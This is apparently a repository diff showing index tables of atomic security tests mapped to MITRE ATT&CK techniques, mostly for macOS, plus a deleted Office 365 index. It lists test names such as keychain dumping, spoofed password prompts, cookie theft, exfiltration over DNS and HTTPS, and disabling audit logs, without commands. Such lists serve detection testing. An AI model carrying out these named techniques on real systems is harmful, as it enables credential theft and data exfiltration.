140 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef sh
141 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
142 command-and-control T1105 Ingress Tool Transfer 31 File download via nscurl 5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c sh
143 command-and-control T1090.001 Proxy: Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
144 command-and-control T1090.001 Proxy: Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
145 collection T1560.001 Archive Collected Data: Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 bash
146 collection T1560.001 Archive Collected Data: Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
147 collection T1560.001 Archive Collected Data: Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
148 collection T1560.001 Archive Collected Data: Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
149 collection T1560.001 Archive Collected Data: Archive via Utility 9 Encrypts collected data with AES-256 and Base64 a743e3a6-e8b2-4a30-abe7-ca85d201b5d3 bash
150 collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
151 collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
152 collection T1056.001 Input Capture: Keylogging 8 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
153 collection T1123 Audio Capture 3 using Quicktime Player c7a0bb71-70ce-4a53-b115-881f241b795b sh
154 collection T1074.001 Data Staged: Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 sh
155 collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
156 collection T1005 Data from Local System 3 Copy Apple Notes database files using AppleScript cfb6d400-a269-4c06-a347-6d88d584d5f7 sh
157 collection T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
158 collection T1056.002 Input Capture: GUI Input Capture 3 AppleScript - Spoofing a credential prompt using osascript b7037b89-947a-427a-ba29-e7e9f09bc045 bash
159 lateral-movement T1021.005 Remote Services:VNC 1 Enable Apple Remote Desktop Agent 8a930abe-841c-4d4f-a877-72e9fe90b9ea sh
160 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
161 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
162 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 5 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
163 privilege-escalation T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
164 privilege-escalation T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
165 privilege-escalation T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
166 privilege-escalation T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
167 privilege-escalation T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
168 privilege-escalation T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
169 privilege-escalation T1546.005 Event Triggered Execution: Trap 3 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
170 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
171 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
172 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
173 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
174 privilege-escalation T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc sh
175 privilege-escalation T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
176 privilege-escalation T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
177 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
178 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
179 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
180 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
181 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
182 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 2 Add launch script to launch daemon fc369906-90c7-4a15-86fd-d37da624dde6 bash
183 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 3 Add launch script to launch agent 10cf5bec-49dd-4ebf-8077-8f47e420096f bash
184 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
185 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
186 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 3 Launch Agent - Root Directory 66774fa8-c562-4bae-a58d-5264a0dd9dd7 bash
187 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
188 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
189 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
190 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
191 privilege-escalation T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
192 privilege-escalation T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
193 privilege-escalation T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
194 privilege-escalation T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
195 credential-access T1056.001 Input Capture: Keylogging 8 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
196 credential-access T1539 Steal Web Session Cookie 3 Steal Chrome Cookies via Remote Debugging (Mac) e43cfdaf-3fb8-4a45-8de0-7eee8741d072 bash
197 credential-access T1539 Steal Web Session Cookie 5 Copy Safari BinaryCookies files using AppleScript e57ba07b-3a33-40cd-a892-748273b9b49a sh
198 credential-access T1555.001 Credentials from Password Stores: Keychain 1 Keychain Dump 88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6 sh
199 credential-access T1555.001 Credentials from Password Stores: Keychain 2 Export Certificate Item(s) 1864fdec-ff86-4452-8c30-f12507582a93 sh
200 credential-access T1555.001 Credentials from Password Stores: Keychain 3 Import Certificate Item(s) into Keychain e544bbcb-c4e0-4bd0-b614-b92131635f59 sh
201 credential-access T1555.001 Credentials from Password Stores: Keychain 4 Copy Keychain using cat utility 5c32102a-c508-49d3-978f-288f8a9f6617 sh
202 credential-access T1040 Network Sniffing 3 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
203 credential-access T1040 Network Sniffing 8 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
204 credential-access T1040 Network Sniffing 9 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
205 credential-access T1552 Unsecured Credentials 1 AWS - Retrieve EC2 Password Data using stratus a21118de-b11e-4ebd-b655-42f11142df0c sh
206 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
207 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 14 Simulating Access to Chrome Login Data - MacOS 124e13e5-d8a1-4378-a6ee-a53cd0c7e369 sh
208 credential-access T1552.004 Unsecured Credentials: Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
209 credential-access T1552.004 Unsecured Credentials: Private Keys 5 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
210 credential-access T1552.004 Unsecured Credentials: Private Keys 7 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
211 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
212 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Find AWS credentials 37807632-d3da-442e-8c2e-00f44928ff8f sh
213 credential-access T1552.001 Unsecured Credentials: Credentials In Files 2 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
214 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
215 credential-access T1552.001 Unsecured Credentials: Credentials In Files 6 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
216 credential-access T1552.001 Unsecured Credentials: Credentials In Files 15 Find Azure credentials a8f6148d-478a-4f43-bc62-5efee9f931a4 sh
217 credential-access T1552.001 Unsecured Credentials: Credentials In Files 16 Find GCP credentials aa12eb29-2dbb-414e-8b20-33d34af93543 sh
218 credential-access T1552.001 Unsecured Credentials: Credentials In Files 17 Find OCI credentials 9d9c22c9-fa97-4008-a204-478cf68c40af sh
219 credential-access T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
220 credential-access T1056.002 Input Capture: GUI Input Capture 3 AppleScript - Spoofing a credential prompt using osascript b7037b89-947a-427a-ba29-e7e9f09bc045 bash
221 credential-access T1110.004 Brute Force: Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
222 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
223 discovery T1016.001 System Network Configuration Discovery: Internet Connection Discovery 2 Check internet connection using ping freebsd, linux or macos be8f4019-d8b6-434c-a814-53123cdcc11e bash
224 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
225 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
226 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
227 discovery T1087.001 Account Discovery: Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
228 discovery T1087.001 Account Discovery: Local Account 7 Enumerate users and groups 319e9f6c-7a9e-432e-8c62-9385c803b6f2 sh
229 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via ioreg a960185f-aef6-4547-8350-d1ce16680d09 sh
230 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 6 Detect Virtualization Environment using sysctl (hw.model) 6beae646-eb4c-4730-95be-691a4094408c sh
231 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 7 Check if System Integrity Protection is enabled 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945 sh
232 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 8 Detect Virtualization Environment using system_profiler e04d2e89-de15-4d90-92f9-a335c7337f0f sh
233 discovery T1040 Network Sniffing 3 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
234 discovery T1040 Network Sniffing 8 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
235 discovery T1040 Network Sniffing 9 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
236 discovery T1135 Network Share Discovery 1 Network Share Discovery f94b5ad9-911c-4eff-9718-fd21899db4f7 sh
237 discovery T1082 System Information Discovery 2 System Information Discovery edff98ec-0f73-4f63-9890-6b117092aff6 sh
238 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
239 discovery T1082 System Information Discovery 8 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 sh
240 discovery T1082 System Information Discovery 12 Environment variables discovery on freebsd, macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
241 discovery T1082 System Information Discovery 13 Show System Integrity Protection status (MacOS) 327cc050-9e99-4c8e-99b5-1d15f2fb6b96 sh
242 discovery T1082 System Information Discovery 33 sysctl to gather macOS hardware info c8d40da9-31bd-47da-a497-11ea55d1ef6c sh
243 discovery T1497.003 Time Based Evasion 1 Delay execution with ping 8b87dd03-8204-478c-bac3-3959f6528de3 sh
244 discovery T1217 Browser Bookmark Discovery 2 List Mozilla Firefox Bookmark Database Files on macOS 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b sh
245 discovery T1217 Browser Bookmark Discovery 3 List Google Chrome Bookmark JSON Files on macOS b789d341-154b-4a42-a071-9111588be9bc sh
246 discovery T1217 Browser Bookmark Discovery 9 List Safari Bookmarks on MacOS 5fc528dd-79de-47f5-8188-25572b7fafe0 sh
247 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
248 discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
249 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
250 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
251 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery FreeBSD, Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
252 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
253 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
254 discovery T1201 Password Policy Discovery 8 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
255 discovery T1614 System Location Discovery 2 Get geolocation info through IP-Lookup services using curl freebsd, linux or macos 552b4db3-8850-412c-abce-ab5cc8a86604 bash
256 discovery T1518.001 Software Discovery: Security Software Discovery 3 Security Software Discovery - ps (macOS) ba62ce11-e820-485f-9c17-6f3c857cd840 sh
257 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
258 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
259 discovery T1046 Network Service Discovery 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
260 discovery T1046 Network Service Discovery 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
261 discovery T1046 Network Service Discovery 12 Port Scan using nmap (Port range) 0d5a2b03-3a26-45e4-96ae-89485b4d1f97 sh
262 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh
263 discovery T1124 System Time Discovery 3 System Time Discovery in FreeBSD/macOS f449c933-0891-407f-821e-7916a21a1a6f sh
264 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
265 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
266 execution T1059.002 Command and Scripting Interpreter: AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
267 execution T1569.001 System Services: Launchctl 1 Launchctl 6fb61988-724e-4755-a595-07743749d4e2 bash
268 execution T1059.004 Command and Scripting Interpreter: Bash 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
269 execution T1059.004 Command and Scripting Interpreter: Bash 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
270 execution T1059.004 Command and Scripting Interpreter: Bash 14 Shell Creation using awk command ee72b37d-b8f5-46a5-a9e7-0ff50035ffd5 sh
271 execution T1059.004 Command and Scripting Interpreter: Bash 15 Creating shell using cpan command bcd4c2bc-490b-4f91-bd31-3709fe75bbdf sh
272 execution T1059.004 Command and Scripting Interpreter: Bash 17 emacs spawning an interactive system shell e0742e38-6efe-4dd4-ba5c-2078095b6156 sh
273 impact T1531 Account Access Removal 4 Change User Password via passwd 3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6 sh
274 impact T1531 Account Access Removal 5 Delete User via dscl utility 4d938c43-2fe8-4d70-a5b3-5bf239aa7846 sh
275 impact T1531 Account Access Removal 6 Delete User via sysadminctl utility d3812c4e-30ee-466a-a0aa-07e355b561d6 sh
276 impact T1486 Data Encrypted for Impact 6 Encrypt files using 7z utility - macOS 645f0f5a-ef09-48d8-b9bc-f0e24c642d72 sh
277 impact T1486 Data Encrypted for Impact 7 Encrypt files using openssl utility - macOS 1a01f6b8-b1e8-418e-bbe3-78a6f822759e sh
278 impact T1496 Resource Hijacking 1 FreeBSD/macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 sh
279 impact T1485 Data Destruction 2 FreeBSD/macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 sh
280 impact T1490 Inhibit System Recovery 12 Disable Time Machine ed952f70-91d4-445a-b7ff-30966bfb1aff sh
281 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - FreeBSD/macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb sh
282 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - FreeBSD/macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de sh
283 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - FreeBSD/macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 sh
284 initial-access T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 sh
285 initial-access T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
286 initial-access T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
287 initial-access T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
288 initial-access T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
289 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl freebsd,linux or macos 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
290 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
291 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
292 exfiltration T1048 Exfiltration Over Alternative Protocol 4 Exfiltrate Data using DNS Queries via dig a27916da-05f2-4316-a3ee-feec67a437be bash
293 exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage 2 Exfiltrate data with rclone to cloud Storage - AWS S3 a4b74723-5cee-4300-91c3-5e34166909b4 powershell
294 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
295 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
atomics/Indexes/Indexes-CSV/office-365-index.csv
-8
View File
@@ -1,8 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
collection,T1114.003,Email Collection: Email Forwarding Rule,1,Office365 - Email Forwarding,3234117e-151d-4254-9150-3d0bac41e38c,powershell
collection,T1114.002,Email Collection: Remote Email Collection,1,Office365 - Remote Mail Collected,36657d95-d9d6-4fbf-8a31-f4085607bafd,powershell
defense-evasion,T1564.008,Hide Artifacts: Email Hiding Rules,1,New-Inbox Rule to Hide E-mail in M365,30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,Office 365 - Set Audit Bypass For a Mailbox,c9a2f6fe-7197-488c-af6d-10c782121ca6,powershell
persistence,T1098.002,Account Manipulation: Additional Email Delegate Permissions,1,EXO - Full access mailbox permission granted to a user,17d046be-fdd0-4cbb-b5c7-55c85d9d0714,powershell
privilege-escalation,T1098.002,Account Manipulation: Additional Email Delegate Permissions,1,EXO - Full access mailbox permission granted to a user,17d046be-fdd0-4cbb-b5c7-55c85d9d0714,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 collection T1114.003 Email Collection: Email Forwarding Rule 1 Office365 - Email Forwarding 3234117e-151d-4254-9150-3d0bac41e38c powershell
3 collection T1114.002 Email Collection: Remote Email Collection 1 Office365 - Remote Mail Collected 36657d95-d9d6-4fbf-8a31-f4085607bafd powershell
4 defense-evasion T1564.008 Hide Artifacts: Email Hiding Rules 1 New-Inbox Rule to Hide E-mail in M365 30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9 powershell
5 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 3 Office 365 - Exchange Audit Log Disabled 1ee572f3-056c-4632-a7fc-7e7c42b1543c powershell
6 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 9 Office 365 - Set Audit Bypass For a Mailbox c9a2f6fe-7197-488c-af6d-10c782121ca6 powershell
7 persistence T1098.002 Account Manipulation: Additional Email Delegate Permissions 1 EXO - Full access mailbox permission granted to a user 17d046be-fdd0-4cbb-b5c7-55c85d9d0714 powershell
8 privilege-escalation T1098.002 Account Manipulation: Additional Email Delegate Permissions 1 EXO - Full access mailbox permission granted to a user 17d046be-fdd0-4cbb-b5c7-55c85d9d0714 powershell

Some files were not shown because too many files have changed in this diff Show More